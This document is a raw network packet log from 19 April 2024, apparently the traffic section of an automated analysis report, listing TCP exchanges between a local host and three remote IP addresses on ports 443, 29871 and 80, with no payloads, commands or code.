Apr 19, 2024 10:59:10.502042055 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.502063036 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.502883911 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.502943039 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.502948999 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.502960920 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.502990961 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.503011942 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.503813028 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.503885984 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.503900051 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.503961086 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.504734039 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.504777908 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.504803896 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.504817009 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.504844904 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.504873991 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.505522013 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.505587101 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.505601883 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.505614042 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.505640030 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.505661964 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.506464005 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.506542921 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.506552935 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.506567955 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.506611109 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.507463932 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.507507086 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.507561922 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.507561922 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.507577896 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.507632971 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.508307934 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.508378029 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.509257078 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.509296894 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.509332895 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.509345055 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.509372950 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.509392977 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.511076927 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.511101007 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.511157036 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.511178017 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.511204958 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.511246920 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.514683008 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.514707088 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.514763117 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.514775991 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.514805079 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.514828920 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.515297890 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.515325069 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.515382051 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.515393972 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.515422106 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.515451908 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.517113924 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.517138958 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.517188072 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.517199993 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.517226934 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.517313004 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.518413067 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.518435955 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.518491983 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.518503904 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.518528938 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.518600941 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.520924091 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.520965099 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.521003008 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.521015882 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.521045923 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.521070004 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.549035072 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.549065113 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.549108028 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.549128056 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.549144983 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.549187899 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.550148010 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.550169945 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.550237894 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.550246000 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.550287008 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.602785110 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.602857113 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.602885962 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.602927923 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.602984905 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.602984905 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.604505062 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.604533911 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.604587078 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.604600906 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.604630947 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.604809999 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.606199026 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.606224060 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.606277943 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.606292963 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.606322050 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.606527090 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.607953072 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.607975960 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.608022928 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.608036041 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.608064890 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.608082056 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.610407114 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.610430956 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.610477924 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.610490084 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.610517979 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.610538960 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.612207890 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.612235069 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.612271070 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.612282038 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.612308025 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.612370968 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.613889933 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.613912106 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.613960981 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.613972902 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.613997936 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.614190102 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.615511894 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.615534067 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.615583897 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.615596056 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.615622044 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.615677118 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.615981102 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.616053104 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.616065979 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.616094112 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.616132021 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.616158962 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.616158962 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.616202116 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:11.443232059 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:11.641292095 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:11.641379118 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:11.642641068 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:11.894373894 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:11.920139074 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:11.921641111 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.119528055 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.121920109 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.159512997 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.231729984 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 10:59:12.320630074 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.320741892 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.321166039 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.440884113 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.7 |
Apr 19, 2024 10:59:12.440979958 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 10:59:12.441730976 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 10:59:12.525772095 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.525854111 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.525892973 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.525938988 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.525966883 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.526047945 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.654450893 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.7 |
Apr 19, 2024 10:59:12.654568911 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 10:59:12.666181087 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.724329948 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724380016 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724419117 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724457026 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724455118 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.724494934 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724534035 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724549055 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.724571943 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724589109 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.724611044 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.724663973 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923240900 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923307896 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923348904 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923388958 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923398018 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923430920 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923469067 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923470020 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923516035 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923527002 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923557043 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923594952 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923624039 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923631907 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923674107 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923691034 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923691988 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923732042 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923755884 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923769951 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923809052 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923851013 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:12.923865080 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.923907995 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:12.925523996 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122601986 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122673988 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122714996 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122755051 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122791052 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.122797966 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122837067 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122862101 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.122875929 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122915983 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122939110 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.122939110 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.122963905 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.122977018 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123016119 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123058081 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123102903 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123115063 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123143911 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123156071 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123194933 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123214006 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123236895 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123275042 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123315096 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123332024 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123354912 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123378992 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123394012 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123430967 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123469114 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123488903 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123507977 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123528004 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123545885 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123583078 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123600960 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123632908 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123673916 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123711109 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123728037 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123749018 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123765945 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123788118 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123826981 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123864889 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.123882055 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.123919964 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.322447062 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322531939 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322572947 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322612047 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322635889 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.322650909 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322674036 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.322689056 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322729111 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322736025 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.322766066 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322803974 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322808981 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.322841883 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322880030 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322890997 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.322918892 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.322954893 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
